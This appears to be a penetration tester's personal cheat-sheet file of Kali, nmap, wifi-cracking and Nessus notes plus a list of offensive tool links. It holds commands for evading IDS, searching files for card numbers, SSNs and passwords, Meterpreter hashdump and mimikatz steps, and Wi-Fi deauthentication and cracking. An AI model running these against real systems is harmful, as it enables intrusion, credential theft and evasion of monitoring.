myfu.txt

# disable ubuntu update 
sudo killall update-notifier
sudo mv /usr/bin/update-notifier /usr/bin/update-notifier.real
echo -e '#!/bin/bash\nwhile :; do /bin/sleep 86400; done' | sudo tee /usr/bin/update-notifier
sudo chmod 755 /usr/bin/update-notifier
You should disable the automatic Kali updates because IDS usually check for that.

The story begins when the attacker was tipped off to an Internet accessible server (sensu.instagram.com). The attacker did not have to take any of the normal recon steps. Normally an attack would need to try to identify sub-domains and IP addresses owned by the business. To find sub-domains, they can try making a domain transfer (AXFR) request, or brute-forcing them. Both these techniques can be accomplished with Bluto. That tool's wordlist doesn't have "sensu" as a possible sub-domain, nor did other tools I looked at. An attacker's sub-domain wordlist should also contain other likely server names associated with common tools such as "nagios", "jenkins", "hudson", "git", etc. 

https://summitroute.com/blog/2015/12/24/instagram_bounty_case_study_for_defense/

# Search office documents for PII
# CC with SSN no dash ( high false positive )
find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b|\b[0-9]{9}\b"

# CC with SSN dash (  low false positive only match ###-##-#### not any 8digi number )
find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b"

(Nice regex. Your cc search can be improved by incorporating the Luhn algorithm to detect valid CC #’s and reduce false-positives. There are also a couple of foreign-issued CC’s that have a slightly different pattern.)

# example PII search CC and SSN with dashes and max results 10 per file
find .  -maxdepth 6  -size -100000k -type f  -exec egrep --max-count 10 -A 2 -B 2 -Hia "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b" '{}' \;

#  head all files for passwords gonig 6 deep ( peeking into all files not just small ones .. )
find .   -maxdepth 6 -type f -exec head -c 100000 '{}' \; |egrep -Hia  -A 4 -B 4 passw

# find passwords 6 deep and less then 1m adding padding so you can see username/hostname info before or after the password field ..
find . -maxdepth 6  -size -100000k -type f  -exec egrep -A 4 -B 4 -Hia passw '{}' \;

 
# can't read ? what is wrong with you ??? find readable files...
find .  -readable -type f

# do a quick tree dump 3 levels deep of folders
find . -maxdepth 3 \( -path /opt -o -path /proc -o -path /tmp \) -prune -o -type d

#Useful UDP Ports - Not TCP Ports - use -top-ports 1000 for that, or scan all 65535 ports, or see below
631,161,137,123,138,1434,445,135,67,53,139,500,68,520,1900,4500,514,49152,162,69,5353,111,49154,1701,998,996,997,999,3283,49153,1812,136,2222,2049,32768,5060,1025,1433,3456,80,20031,1026,7,1646,1645,1089,1090,1091,1541,4000,5050,5051,11001,20000,34962,34963,34964,34980,44818,45678,47808,50020,50021,55000,55001,55002,55003,5555

java -Xmx1024M -XX:MaxPermSize=1G -jar ~/Documents/Tools/burpsuite_pro_v1.6.39.jar &

perl -pi -e 's/;/\n/g' d; cat d | sort -V | uniq > dsrt.txt

#todo: add cut command from nmap -sL list generation

When running john, all you need to use new wordlists is cd to the directory with the wordlists (in txt format, like rockyou.txt) and run something like the following: john --wordlist=cain.txt --fork=4 logs/*.txt --rules
No need to add them to the /usr/share/john directory and john.conf.

nmap --max-retries 2 helps speed things up

Name progress files with .progress, it makes it easier for naming.

SMB is 135-139, 445. smb-enum-domains takes less time, smb-enum-shares much longer. Before running smb-enum-shares.nse, parse out positive domain listings from smb-enum-domains and feed them into smb-enum-shares. Also specify -p 135-139,445 to speed things up a bit.

https://countuponsecurity.files.wordpress.com/2015/06/jtr-cheat-sheet.pdf

consider generating a wordlist with american english words with numbers appended

Todo: new kali - configure java applet in browsers, also make sure to install necessary addons for Burp FF/Iceweasel Profile

#EyeWitness Usage
chmod +x EyeWitness.py
./EyeWitness.py --all-protocols --timeout 20 -x ~/Documents/Target.xml

#
#copy to clipboard in terminal
xclip -i inputfile.txt -selection c

#scroll up in screen
Ctrl-A, Escape. Then Return or Escape 2X to get back to typing.

#screen
screen -L for logging, screen -S to create a name for the screen
screen -L -S new_name
Ctrl-A K to end session

#new perl nessus compiler requires these modules
 XML::TreePP
    o	Data::Dumper
    o	Math::Round
    o	Excel::Writer::XLSX
    	PAR::Dist
    o	Data::Table
    o	Excel::Writer::XLSX::Chart
    o	Getopt::Std
#melcara perl script usage
perl parse_nessus_xml.v22.pl -f merged_report.nessus 

#Validation of Nessus findings
enum4linux + nmblookup + smbclient for snmp-flagged and 139/445 hosts and smb null sessions
rdp-sec-check.pl in ~/Applications, for Terminal Services.
nmbscan in ~/Applications/nmbscan-tool/nmbscan for scanning shares of a NetBIOS network and detecting windows hosts
nmap --script ssl-cert,ssl-enum-ciphers -p 443,1413,3389,465,993,995 -oA cipher_check 144.74.201.0/24 for ssl cert checks
you can also use openssl s_client -connect <IP>

rpcclient for smb null session
nbtscan - Windows only - scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. - port 137 - done on all

snmpwalk for public snmp servers
remember smtp is for mail (port 25)

smb null sessions - rpcclient and msfconsole - use auxiliary/scanner/smb/pipe_auditor 

#Mount NFS in Kali
apt-get install nfs-common portmap -y
(Random init scripts will not get started, thanks to Kali policy).

mount -t nfs 127.0.0.1:/path/to/share new_folder

#Parse IPs that reply to pings out of nmap plain ping scan, straight into useful list.
nmap -sn -PS 192.168.1.1/24 -oG - | awk '/Up$/{print $2}' > 192.168.1.up

#Exploitation
Let's say a machine with a critical SMB exploit isn't getting popped. Try running psexec module in Metasploit against it. Use administrator:password as uname/pw, and set workgroup. in Meterpreter, run:
sysinfo
getuid
getsystem
hashdump
load mimikatz
msv
kerberos
run post/windows/gather/enum and tab the rest
post/windows/gather/smart_hashdump

#more wordlists-
http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists/?redirect
https://hashes.org/crackers.php

#Enable sound (keyword:alsa) in Kali Linux
systemctl --user enable pulseaudio

#DNS Server Cache snooping - or see HTML page
https://www.neowin.net/forum/topic/1272202-dns-bind-vulnerability-remediation/

##package Nessus Parser into executable
pp -M JSON -M PAR::Dist -M URI::Escape -M LWP::UserAgent -M HTTP::Cookies -M Data::Dump -M Data::Dumper -M XML::Hash::XS -M XML::TreePP -M MIME::Base64 -M Math::Round -M Excel::Writer::XLSX  -M Excel::Writer::XLSX::Chart -M Excel::Writer::XLSX::Chart::Pie -M Data::Table -M Getopt::Std  parse_nessus_xml.v22.pl

Generating grub configuration file ...
Found background image: .background_cache.png
Found linux image: /boot/vmlinuz-4.9.0-kali2-amd64
Found initrd image: /boot/initrd.img-4.9.0-kali2-amd64
Found linux image: /boot/vmlinuz-4.9.0-kali1-amd64
Found initrd image: /boot/initrd.img-4.9.0-kali1-amd64
Found linux image: /boot/vmlinuz-4.6.0-kali1-amd64
Found initrd image: /boot/initrd.img-4.6.0-kali1-amd64
done

#decrypting cookies
10:18 < flawseeker>  megan35, atom128, zong22. Maybe it can help
#youtube-dl
sudo youtube-dl --extract-audio --audio-format mp3 -c --restrict-filenames https://www.youtube.com/watch?v=gkzXd53yWMA > /dev/null 2>&1 &

#nikto
 nikto.pl -h nikto_hosts_file.txt -Display VPE -F htm -output nikto_all_scan_2.html

#grep inside folder/directory
grep -nr "Wireless channel to scan" .

#Parsing degenerate scan results (nmap -sL)
nmap -n -sL 192.168.1.1/24 | grep 'Nmap scan report for' | cut -f 5 -d ' ' > ips.txt

#listen for incoming ICMP packets
tcpdump ip proto \\icmp


 1216  ps | grep nfspy
 1217  ps
 1218  ps -e
 1219  kill 18546
 1220  cd /
 1221  ls
 1222  ls -l
 1223  ls -of
 1224  lsof

#nfs mounting
nfspy -o server=192.168.1.1:/images,hide,allow_other /path/to/special/directory/mountpoint



#Java Deserializtion
ysoserial
https://github.com/getcode2git/exserial.git
PowerSploit has SimpleHTTPServer I think
loubia.py from https://github.com/metalnas/loubia for Weblogic

#airodump-ng 5ghz all frequencies. It hops in 20mhz sections and will see stuff on channel 165.
airodump-ng -C 5035-5825 wlan0mon

#airodump-ng 2.4ghz all bands
airodump-ng --channel 1-14 wlan0mon

#wireshark filter probe response
Twlan.fc.type_subtype eq 5.

#Sublime Text
Format as XML? Package Control, Install Package, indentXML, then go to Selection - Format - Indent XML/JSON

#Starting eth0
ifconfig eth0 down

ifconfig eth0 <desired ip> netmask <netmask> up
route add default gw <gateway>


Testing Heartbleed
---------------
    If you're running Ubuntu and want to test Heartbleed you'll need to downgrade to a vulnerable
    version of OpenSSL. That can be done by:

wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/openssl_1.0.1-4ubuntu5.11_i386.deb
wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl-dev_1.0.1-4ubuntu5.11_i386.deb
wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl-doc_1.0.1-4ubuntu5.11_all.deb
wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/5436465/+files/libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb
sudo dpkg -i libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb 
sudo dpkg --install libssl1.0.0_1.0.1-4ubuntu5.11_i386.deb \
libssl-dev_1.0.1-4ubuntu5.11_i386.deb \
libssl-doc_1.0.1-4ubuntu5.11_all.deb \
openssl_1.0.1-4ubuntu5.11_i386.deb 


    Then use wpa_supplicant to connect to hostapd-wpe -c 

ls -l /etc/NetworkManager/system-connections/ then remove entries (ProbeRequests)

Download free version of MS product - use virtual lab. Guided lessons. 

 aircrack-ng --bssid E8:04:62:F6:ED:C0 -e "SSID-Name" ~/Tools/wifite2/hs/handshake_identified_ESSID_MACADDRESS.cap -w ~/Tools/Wordlists/rockyou.txt 

 aireplay-ng -0 5 -b bssid_mac -c client_mac -c channel interface
 
#Common HTTP Ports for EyeWitness
--add-http-ports 80,8080,8008,8888,8081,280,591,593,2480,4444,4445,4567,5000,5104,5800,5988,5989,7001,8042,8280,8281,8530,8887,9080,9981,11371,16080

--add-https-ports 443,8443,981,1311,7000,7002,8243,8531,8888,9443,12043,12443,18091,18092

######

D) Start the gpsd daemon running
------------------------------------------------
Arguments:
-G to listen on all addresses rather than only localhost
-n to start reading the GPS device immediately, not waiting for a client call
-F to specify the control socket to use

sudo gpsd /dev/ttyUSB0 -G -n -F /var/run/gpsd.sock

Note that you have to be careful when using this start command that you specify
the correct tty device. In my case the GPS has switched between ttyUSB0 and ttyUSB1...

E) Check its state
--------------------------------------------------
gpspipe -r -n 10
{"class":"VERSION","release":"3.16","rev":"3.16","proto_major":3,"proto_minor":11}
{"class":"DEVICES","devices":[{"class":"DEVICE","path":"/dev/ttyUSB1","driver":"SiRF","activated":"2016-03-08T13:56:21.583Z","flags":1,"native":1,"bps":4800,"parity":"N","stopbits":1,"cycle":1.00}]}
{"class":"WATCH","enable":true,"json":false,"nmea":true,"raw":0,"scaled":false,"timing":false,"split24":false,"pps":false}
$GPGSV,2,1,07,30,19,093,18,13,56,171,33,10,14,334,25,20,16,237,28*7D
$GPGSV,2,2,07,28,58,076,28,24,30,270,21,15,59,259,27*42
$GPZDA,135622.00,08,03,2016,00,00*69
$GPGGA,135622,5924.2698,N,01749.1051,E,1,07,2.20,27.62,M,26.432,M,,*75
$GPRMC,135622,A,5924.2698,N,01749.1051,E,0.0000,0.000,080316,,*21
$GPGSA,A,3,30,13,10,20,28,24,15,,,,,,1.9,2.2,1.5*34
$GPZDA,135623.00,08,03,2016,00,00*68

or

cgps -s
##########


#nmap parsing
 cat 172.17_19_connect_version_scan.gnmap | awk '{printf "%s\t", $2;
      for (i=4;i<=NF;i++) {
        split($i,a,"/");
        if (a[2]=="open") printf ",%s",a[1];}
      print ""}' | sed -e 's/,//' > parsed.txt

# du disk usage sort
du -k * | sort -nr | cut -f2 | xargs -d '\n' du -sh

figure out how to visualize just connected clients to a target ESSID and/or BSSID 

#easy decode in bash

alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"'

#A stop job is running for Session c2 of user

It appears you can reduce the timeout in /etc/systemd/system.conf:

DefaultTimeoutStartSec=10s
DefaultTimeoutStopSec=10s

#vmware,tools,kali,kali.org
https://docs.kali.org/general-use/install-vmware-tools-kali-guest

 - then run mount-shared-folders each time

 On a Windows VM the shared folder is under Network

#metasploit, nmap, importing
 https://www.redspin.com/it-security-blog/2011/09/importing-and-working-with-nmap-scans-in-metasploit-framework-4/

# Old versions of Firefox addons

 https://addons.mozilla.org/en-US/firefox/addon/web-developer/versions/

 ## Current TCP Ports list

0,7,21,22,23,25,42,53,67,69,80,110,119,123,135,139,161,162,280,389,443,445,591,593,636,873,993,995,981,1234,1389,1433,1521,1522,8445,8443,8080,8008,8000,9443,2480,4444,4445,4567,5000,5104,5800,5988,5989,6666,7001,8042,8280,8281,8530,8887,9080,9981,11371,16080,6600,7000,7002,50000,50001,8243,8531,12043,12443,18091,18092,3306,3389,5800,5900,5901,5902,5988,5989

#release ip address linux
dhclient -r -v

#count port occurrence (but only when each port is separated by something other than a newline, like a space)
 cat ports.txt | tr ' ' '\n' | sort | uniq -c | awk '{print $2"@"$1}' > ports_count.txt

#Nmap top 1000 tcp ports (with port 80)
1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389  
#Nmap top 1000 UDP ports
2-3,7,9,13,17,19-23,37-38,42,49,53,67-69,80,88,111-113,120,123,135-139,158,161-162,177,192,199,207,217,363,389,402,407,427,434,443,445,464,497,500,502,512-515,517-518,520,539,559,593,623,626,631,639,643,657,664,682-689,764,767,772-776,780-782,786,789,800,814,826,829,838,902-903,944,959,965,983,989-990,996-1001,1007-1008,1012-1014,1019-1051,1053-1060,1064-1070,1072,1080-1081,1087-1088,1090,1100-1101,1105,1124,1200,1214,1234,1346,1419,1433-1434,1455,1457,1484-1485,1524,1645-1646,1701,1718-1719,1761,1782,1804,1812-1813,1885-1886,1900-1901,1993,2000,2002,2048-2049,2051,2148,2160-2161,2222-2223,2343,2345,2362,2967,3052,3130,3283,3296,3343,3389,3401,3456-3457,3659,3664,3702-3703,4000,4008,4045,4444,4500,4666,4672,5000-5003,5010,5050,5060,5093,5351,5353,5355,5500,5555,5632,6000-6002,6004,6050,6346-6347,6970-6971,7000,7938,8000-8001,8010,8181,8193,8900,9000-9001,9020,9103,9199-9200,9370,9876-9877,9950,10000,10080,11487,16086,16402,16420,16430,16433,16449,16498,16503,16545,16548,16573,16674,16680,16697,16700,16708,16711,16739,16766,16779,16786,16816,16829,16832,16838-16839,16862,16896,16912,16918-16919,16938-16939,16947-16948,16970,16972,16974,17006,17018,17077,17091,17101,17146,17184-17185,17205,17207,17219,17236-17237,17282,17302,17321,17331-17332,17338,17359,17417,17423-17424,17455,17459,17468,17487,17490,17494,17505,17533,17549,17573,17580,17585,17592,17605,17615-17616,17629,17638,17663,17673-17674,17683,17726,17754,17762,17787,17814,17823-17824,17836,17845,17888,17939,17946,17989,18004,18081,18113,18134,18156,18228,18234,18250,18255,18258,18319,18331,18360,18373,18449,18485,18543,18582,18605,18617,18666,18669,18676,18683,18807,18818,18821,18830,18832,18835,18869,18883,18888,18958,18980,18985,18987,18991,18994,18996,19017,19022,19039,19047,19075,19096,19120,19130,19140-19141,19154,19161,19165,19181,19193,19197,19222,19227,19273,19283,19294,19315,19322,19332,19374,19415,19482,19489,19500,19503-19504,19541,19600,19605,19616,19624-19625,19632,19639,19647,19650,19660,19662-19663,19682-19683,19687,19695,19707,19717-19719,19722,19728,19789,19792,19933,19935-19936,19956,19995,19998,20003-20004,20019,20031,20082,20117,20120,20126,20129,20146,20154,20164,20206,20217,20249,20262,20279,20288,20309,20313,20326,20359-20360,20366,20380,20389,20409,20411,20423-20425,20445,20449,20464-20465,20518,20522,20525,20540,20560,20665,20678-20679,20710,20717,20742,20752,20762,20791,20817,20842,20848,20851,20865,20872,20876,20884,20919,21000,21016,21060,21083,21104,21111,21131,21167,21186,21206-21207,21212,21247,21261,21282,21298,21303,21318,21320,21333,21344,21354,21358,21360,21364,21366,21383,21405,21454,21468,21476,21514,21524-21525,21556,21566,21568,21576,21609,21621,21625,21644,21649,21655,21663,21674,21698,21702,21710,21742,21780,21784,21800,21803,21834,21842,21847,21868,21898,21902,21923,21948,21967,22029,22043,22045,22053,22055,22105,22109,22123-22124,22341,22692,22695,22739,22799,22846,22914,22986,22996,23040,23176,23354,23531,23557,23608,23679,23781,23965,23980,24007,24279,24511,24594,24606,24644,24854,24910,25003,25157,25240,25280,25337,25375,25462,25541,25546,25709,25931,26407,26415,26720,26872,26966,27015,27195,27444,27473,27482,27707,27892,27899,28122,28369,28465,28493,28543,28547,28641,28840,28973,29078,29243,29256,29810,29823,29977,30263,30303,30365,30544,30656,30697,30704,30718,30975,31059,31073,31109,31189,31195,31335,31337,31365,31625,31681,31731,31891,32345,32385,32528,32768-32780,32798,32815,32818,32931,33030,33249,33281,33354-33355,33459,33717,33744,33866,33872,34038,34079,34125,34358,34422,34433,34555,34570,34577-34580,34758,34796,34855,34861-34862,34892,35438,35702,35777,35794,36108,36206,36384,36458,36489,36669,36778,36893,36945,37144,37212,37393,37444,37602,37761,37783,37813,37843,38037,38063,38293,38412,38498,38615,39213,39217,39632,39683,39714,39723,39888,40019,40116,40441,40539,40622,40708,40711,40724,40732,40805,40847,40866,40915,41058,41081,41308,41370,41446,41524,41638,41702,41774,41896,41967,41971,42056,42172,42313,42431,42434,42508,42557,42577,42627,42639,43094,43195,43370,43514,43686,43824,43967,44101,44160,44179,44185,44190,44253,44334,44508,44923,44946,44968,45247,45380,45441,45685,45722,45818,45928,46093,46532,46836,47624,47765,47772,47808,47915,47981,48078,48189,48255,48455,48489,48761,49152-49163,49165-49182,49184-49202,49204-49205,49207-49216,49220,49222,49226,49259,49262,49306,49350,49360,49393,49396,49503,49640,49968,50099,50164,50497,50612,50708,50919,51255,51456,51554,51586,51690,51717,51905,51972,52144,52225,52503,53006,53037,53571,53589,53838,54094,54114,54281,54321,54711,54807,54925,55043,55544,55587,56141,57172,57409-57410,57813,57843,57958,57977,58002,58075,58178,58419,58631,58640,58797,59193,59207,59765,59846,60172,60381,60423,61024,61142,61319,61322,61370,61412,61481,61550,61685,61961,62154,62287,62575,62677,62699,62958,63420,63555,64080,64481,64513,64590,64727,65024  

#!/bin/bash

#echo "Usage: ./mon_mode.sh wlan1|wlan0"
ip link set $1 down
echo "\nip link set $1 down"
iw dev $1 set type monitor
echo "\niw dev $1 set type monitor"
ip link set $1 up
echo "\nip link set $1 up"


# 2.4 ghz channels 
1   2412    
2   2417    
3   2422    
4   2427    
5   2432    
6   2437    
7   2442    
8   2447    
9   2452    
10  2457    
11  2462    
12  2467 
13  2472 
14  2484

# 5 ghz channels

7   5035    5030–5040 
8   5040    5030–5050 
9   5045    5040–5050 
11  5055    5050–5060
12  5060    5050–5070
16  5080    5070–5090
34  5170    Unknown     
36  5180    5170–5190
38  5190    5170–5210
40  5200    5190–5210
42  5210    5170–5250
44  5220    5210–5230
46  5230    5210–5250
48  5240    5230–5250
50  5250    5170–5330
52  5260    5250–5270
54  5270    5250–5290
56  5280    5270–5290
58  5290    5250–5330
60  5300    5290–5310
62  5310    5290–5330
64  5320    5310–5330
100     5500    5490–551
102     5510    5490–553
104     5520    5510–553
106     5530    5490–557
108     5540    5530–555
110     5550    5530–557
112     5560    5550–557
114     5570    5490–565
116     5580    5570–559
118     5590    5570–561
120     5600    5590–561
122     5610    5570–565
124     5620    5610–563
126     5630    5610–565
128     5640    5630–565
132     5660    5650–567
134     5670    5650–569
136     5680    5670–569
138     5690    5650–573
140     5700    5690–571
142     5710    5690–573
144     5720    5710–573
149     5745    5735–575
151     5755    5735–577
153     5765    5755–577
155     5775    5735–581
157     5785    5775–579
159     5795    5775–581
161     5805    5795–581
165     5825    5815–583

sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other,nonempty

sudo mount -t cifs //192.168.1.0/share /mnt/mountpoint/ -o user=,password=

#recursively add file extension to all files
Alternative command without an explicit loop (man find):

find . -type f -exec mv '{}' '{}'.jpg \;
Explanation: this recursively finds all files (-type f) starting from the current directory (.) and applies the move command (mv) to each of them. Note also the quotes around {}, so that filenames with spaces (and even newlines...) are properly handled.


#smb-enum-users nmap
nmap -n -Pn -p445 --open --script=smb-enum-users --script-args=smbnoguest 1.1.1.1


General:
Cheatsheets - Penetration Testing/Security Cheatsheets - https://github.com/liorvh/Cheatsheets-1
awesome-pentest - penetration testing resources - https://github.com/Hack-with-Github/Awesome-Hacking
Red-Team-Infrastructure-Wiki - Red Team infrastructure hardening resources  - https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Infosec_Reference - Information Security Reference - https://github.com/rmusser01/Infosec_Reference

Web Services:
JettyBleed - Jetty HttpParser Error Remote Memory Disclosure - https://github.com/AppSecConsulting/Pentest-Tools
clusterd - Jboss/Coldfusion/WebLogic/Railo/Tomcat/Axis2/Glassfish - https://github.com/hatRiot/clusterd
xsser - From XSS to RCE wordpress/joomla - https://github.com/Varbaek/xsser
Java-Deserialization-Exploit - weaponizes ysoserial code to gain a remote shell - https://github.com/njfox/Java-Deserialization-Exploit
CMSmap - CMS scanner - https://github.com/Dionach/CMSmap
wordpress-exploit-framework - penetration testing of WordPress - https://github.com/rastating/wordpress-exploit-framework
joomlol - Joomla User-Agent/X-Forwarded-For RCE  - https://github.com/compoterhacker/joomlol
joomlavs -  Joomla vulnerability scanner - https://github.com/rastating/joomlavs
mongoaudit - MongoDB auditing and pentesting tool - https://github.com/stampery/mongoaudit
davscan - Fingerprints servers, finds exploits, scans WebDAV - https://github.com/Graph-X/davscan

Web Applications:
HandyHeaderHacker -  Examine HTTP response headers for common security issues - https://github.com/vpnguy/HandyHeaderHacker
OpenDoor - OWASP Directory Access scanner - https://github.com/stanislav-web/OpenDoor
ASH-Keylogger - simple keylogger application for XSS attack - https://github.com/AnonymousSecurityHackers/ASH-Keylogger
tbhm - The Bug Hunters Methodology  - https://github.com/jhaddix/tbhm
commix - command injection - https://github.com/commixproject/commix
NoSQLMap - Mongo database and NoSQL - https://github.com/tcstool/NoSQLMap
xsshunter - Second order XSS - https://github.com/mandatoryprogrammer/xsshunter

Burp Extensions:
backslash-powered-scanner - unknown classes of injection vulnerabilities - https://github.com/PortSwigger/backslash-powered-scanner
BurpSmartBuster - content discovery plugin - https://github.com/pathetiq/BurpSmartBuster
ActiveScanPlusPlus - extends Burp Suite's active and passive scanning capabilities - https://github.com/albinowax/ActiveScanPlusPlus

Local privilege escalation:
yodo - become root via limited sudo permissions - https://github.com/b3rito/yodo
Pa-th-zuzu - Checks for PATH substitution vulnerabilities - https://github.com/ShotokanZH/Pa-th-zuzu
sudo-snooper - acts like the original sudo binary to fool users - https://github.com/xorond/sudo-snooper
RottenPotato - local privilege escalation from service account  - https://github.com/foxglovesec/RottenPotato
UACMe - Windows AutoElevate backdoor - https://github.com/hfiref0x/UACME
Invoke-LoginPrompt - Invokes a Windows Security Login Prompt - https://github.com/enigma0x3/Invoke-LoginPrompt
Exploits-Pack - Exploits for getting local root on Linux - https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
windows-privesc-check - Standalone Executable - https://github.com/pentestmonkey/windows-privesc-check
unix-privesc-check -  simple privilege escalation vectors - https://github.com/pentestmonkey/unix-privesc-check
LinEnum - local Linux Enumeration & Privilege Escalation Checks - https://github.com/rebootuser/LinEnum
cowcron - Cronbased Dirty Cow Exploit - https://github.com/securifera/cowcron
WindowsExploits - Precompiled Windows exploits - https://github.com/abatchy17/WindowsExploits
Privilege-Escalation - common local exploits and enumeration scripts  - https://github.com/AusJock/Privilege-Escalation
Unix-Privilege-Escalation-Exploits-Pack - https://github.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack
Sherlock - PowerShell script to quickly find missing software patches - https://github.com/rasta-mouse/Sherlock
GTFOBins -  list of Unix binaries that can be exploited to bypass system security restrictions - https://github.com/GTFOBins/GTFOBins.github.io

Phishing:
eyephish - find similar looking domain names - https://github.com/phar/eyephish
luckystrike - A PowerShell based utility for the creation of malicious Office macro documents - https://github.com/Shellntel/luckystrike
phishery - Basic Auth Credential Harvester with a Word Document Template URL Injector  - https://github.com/ryhanson/phishery
WordSteal - steal NTLM hashes - https://github.com/0x090x0/WordSteal
ReelPhish - Real-Time Two-Factor Phishing Tool - https://github.com/fireeye/ReelPhish

Open Source Intelligence: 
